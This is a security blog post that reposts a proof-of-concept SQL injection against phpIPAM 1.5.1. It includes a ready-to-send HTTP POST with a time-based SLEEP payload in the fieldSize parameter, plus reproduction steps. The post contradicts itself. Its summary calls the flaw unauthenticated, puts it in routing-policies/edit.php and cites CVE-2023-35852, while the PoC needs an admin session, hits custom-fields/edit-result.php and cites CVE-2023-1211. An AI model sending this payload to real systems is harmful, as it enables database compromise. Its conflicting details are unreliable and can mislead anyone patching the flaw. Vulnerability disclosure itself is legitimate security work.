Latest Tech

Latest Posts

phpIPAM 1.5.1 SQL Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 99
phpIPAM 1.5.1 SQL Injection
phpIPAM 1.5.1 SQL Injection
CVE-2023-35852 identifies an **unauthenticated SQL injection vulnerability** in phpIPAM version CVE-2023-35852 identifies an **unauthenticated SQL injection vulnerability** in phpIPAM version 1.5.1.

The flaw resided in the `id` parameter within the routing policies functionality (e.g., `app/admin/routing-policies/edit.php`). Insufficient input sanitization allowed attackers to inject malicious SQL queries directly into the database.

This enabled full database compromise, including data exfiltration, modification, or deletion of sensitive network information. Its unauthenticated nature made it critical, allowing remote attackers to exploit it without credentials.

The vulnerability was addressed in subsequent versions through proper input validation and the use of prepared statements.

# Exploit Title: phpIPAM 1.5.1 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2023-1211


Proof Of Concept
POST /app/admin/custom-fields/edit-result.php HTTP/1.1
Host: phpipam
Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token>
Content-Type: application/x-www-form-urlencoded

csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES

**Prerequisites:**
1. Valid authenticated session (PHPSESSID cookie)
2. Valid CSRF token (obtain from `/admin/custom-fields/` page first)
3. Target table must exist (default 'devices' table used)
4. Field type must be enum/set to reach vulnerable code path

**Manual Test Steps:**
1. Login to phpIPAM
2. Visit `/admin/custom-fields/` to get CSRF token
3. Send POST request with above payload

**Note:** Replace `<valid_session_id>` and `<valid_csrf_token>` with actual values from authenticated session. The `fieldSize` parameter injects SQL through enum/set type definition context.



Steps to Reproduce
Login as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie and csrf token.
Observe the result

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.